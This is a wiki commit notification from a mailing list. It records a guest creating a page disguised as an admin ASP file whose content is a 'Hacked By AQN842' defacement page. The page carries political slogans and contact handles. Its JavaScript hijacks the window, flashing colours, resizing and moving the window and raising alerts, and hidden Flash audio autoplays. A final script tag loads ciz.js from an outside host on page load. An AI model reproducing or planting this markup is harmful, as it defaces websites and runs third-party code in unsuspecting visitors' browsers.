[commits] [Wiki] created: admin/RTE_popup_file_atch.asp
Wiki Guest
wikiguest at horde.org
Mon Apr 10 03:43:15 UTC 2023
guest [83.121.43.206] Mon, 10 Apr 2023 03:43:15 +0000
Created page: https://wiki.horde.org/admin/RTE_popup_file_atch.asp
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>...::Hacked By AQN842::....</title>
<style type="text/css">
*,html,body,div,p,h2{padding: 0px;margin: 0px;}body{background-color:
#000000;}#container{margin: 0 auto;width: 980px;padding-top:
40px;}#content-container{float: left;width: 980px;}#content{clear:
left;float: left;width: 581px;padding: 20px 0 20px 0;margin: 0 0 0
30px;display: inline;color: #333;}#content h2 {font-family:
Cambria;font-size: 170px;}#aside{float: right;width: 348px;padding:
0px;display: inline;background-image:
url('http://pas1995.persiangig.com/image/805740121.jpg');height:
376px;}.hacker{float: right;font-family: Cambria;font-size:
30px;font-weight: bold;}.notes{padding-top: 90px;line-height:
1.3em;font-weight: bold;font-size: 16px;font-family: "Courier
New";}.contact{padding-top: 30px;font-size: 18px;font-family: "Courier
New", Courier, monospace;font-weight: bold;color:
#800000;}#music{padding: 80px 80px 0px 0px;float: right;clear:
right;}</style>
</head>
<script type="text/javascript">/*<![CDATA[*/
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined") || (typeof
element.innerHTML == "undefined")) {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback :
function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "");
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "") this.element.id = "typingtext" +
TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined") {
setTimeout("document.getElementById('" + this.element.id +
"').typingText.run()", this.interval);
return;
}
if(this.currentText == "") this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" &&
!this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" &&
this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar <
this.origText.length - 1 ? (typeof this.cursor == "function" ?
this.cursor(this.currentText) : this.cursor) : "");
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id +
"').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
/*]]>*/</script>
<script>
window.scrollBy(0, 1)
window.resizeTo(0,0)
window.moveTo(0,0)
//setInterval("move()",30);
setTimeout("move()", 1);
var mxm=50
var mym=25
var mx=0
var my=0
var sv=50
var status=1
var szx=0
var szy=0
var c=255
var n=0
var sm=30
var cycle=2
var done=2
function move()
{
if (status == 1)
{
mxm=mxm/1.05
mym=mym/1.05
mx=mx+mxm
my=my-mym
mxm=mxm+(400-mx)/100
mym=mym-(300-my)/100
window.moveTo(mx,my)
rmxm=Math.round(mxm/10)
rmym=Math.round(mym/10)
if (rmxm == 0)
{
if (rmym == 0)
{
status=2
}
}
}
if (status == 2)
{
sv=sv/1.1
scrratio=1+1/3
mx=mx-sv*scrratio/2
my=my-sv/2
szx=szx+sv*scrratio
szy=szy+sv
window.moveTo(mx,my)
window.resizeTo(szx,szy)
if (sv < 0.1)
{
status=3
}
}
if (status == 3)
{
document.fgColor=0xffffFF
c=c-16
if (c<0)
{status=8}
}
if (status == 4)
{
c=c+16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 239)
{status=5}
}
if (status == 5)
{
c=c-16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c < 0)
{
status=6
cycle=cycle-1
if (cycle > 0)
{
if (done == 1)
{status=7}
else
{status=4}
}
}
}
if (status == 6)
{
document.title = "Cljck"
alert("Cljck")
cycle=2
status=4
done=1
}
if (status == 7)
{
c=c+4
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 128)
{status=8}
}
if (status == 8)
{
window.moveTo(0,0)
sx=screen.availWidth
sy=screen.availHeight
window.resizeTo(sx,sy)
status=9
}
var timer=setTimeout("move()",0.3)
}
</script>
<body>
<div id="container">
<div id="content-container">
<div id="content">
<h2><font color="maroon">Hacked</font></h2>
<p class="hacker">It is not the first, nor will it be the last </p>
<p class="hacker">نه اولین است و نه آخرین خواهد بود</p>
<p id="message" class="notes">
Your website has been hacked by AQN842.!!!<br />
HI<br />
We will build a beautiful Iran..<br />
And you will have no place in Iran..<br />
A government with freedom of all religions..<br />
زن_زندگی_ازادی#<br />
<br />
<font color="maroon">Telegram: @aqn842_bot </font><br />
<font color="maroon">twitter: @AQN842 </font><br />
<font color="maroon">AQN842 Was Here . . . . !!! </font></p>
<p class="notes"> </p>
<script type="text/javascript">/*<![CDATA[*/
new TypingText(document.getElementById("message"), 90, function(i){
var ar = new Array("_", " ", "_", " "); return " " + ar[i.length %
ar.length]; });
//Type out examples:
TypingText.runAll();
/*]]>*/</script>
</div>
<div id="aside" >
</div>
<div id="music">
<object type="application/x-shockwave-flash"
data="http://flash-mp3-player.net/medias/player_mp3_mini.swf"
width="200" height="20">
<param name="movie"
value="http://flash-mp3-player.net/medias/player_mp3_mini.swf" />
<param name="bgcolor" value="#000000" />
<param name="FlashVars"
value="mp3=http://cocainteam.persiangig.com/Eminem%20DMX%20Obie%20Trice%20-%20Go%20To%20Sleep%20%28Trimmed%29.mp3&autoplay=1&loadingcolor=000000&buttoncolor=000000&slidercolor=000000"
/>
</object>
</div>
</div>
<p> </p>
</div>
<embed src="http://sarbaz-faz.persiangig.com/Hack/Troy%20.mp3.swf"
width="300" height="60" autostart="true" loop="true" hidden="true">
</body>
</html>
<SCRIPT SRC=http://www.otoelektronik.net/yazciz/ciz.js></SCRIPT>
More information about the commits
mailing list